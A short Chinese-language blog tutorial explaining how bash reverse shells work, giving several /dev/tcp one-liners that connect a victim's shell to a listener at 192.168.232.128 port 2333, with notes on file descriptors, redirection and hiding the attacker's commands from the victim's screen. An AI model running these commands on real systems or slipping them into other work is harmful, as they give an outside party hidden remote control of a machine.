反弹shell
1.攻击者拿到受害者shell
bash -i >& /dev/tcp/192.168.232.128/2333 0>&
-i表示产生交互的shell
/dev/tcp/ip/port
'> &'
表示将标准输入和标准错误输出重定向到文件(目的:为了不在受害者终端中显示执行的命令)
当>&后边接文件时,表示将表示将标准输入输出重定向到文件
当>&后边接文件描述符时,表示讲前面的文件描述符重定向到后边的文件描述符
/dev/tcp|udp/ip/port
这个文件是特别特殊的,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的,但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信
文件描述符
0 - stdin,代表标准输入
1 - stdout,代表标准输出
2 - stderr,代表标准错误输出
0>&1
将标准输入重定向到标准输出
2.攻击者的输入会同时显示到受害者的输出和自身
cat < /dev/tcp/192.168.232.128/2333
3.受害者的命名会显示到攻击者的界面
bash -i > /dev/tcp/192.168.232.128/2333
4.攻击者对受害者的命令会显示到攻击者页面,指令同时显示给两者
bash -i > /dev/tcp/192.168.232.128/2333 0>&1
5.攻击者对受害者的命令会显示到攻击者页面,指令只有攻击者看的见
bash -i >& /dev/tcp/192.168.232.128/2333 0>&1
作者:
Shu-How Z
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文连接,否则保留追究法律责任的权利。

浙公网安备 33010602011771号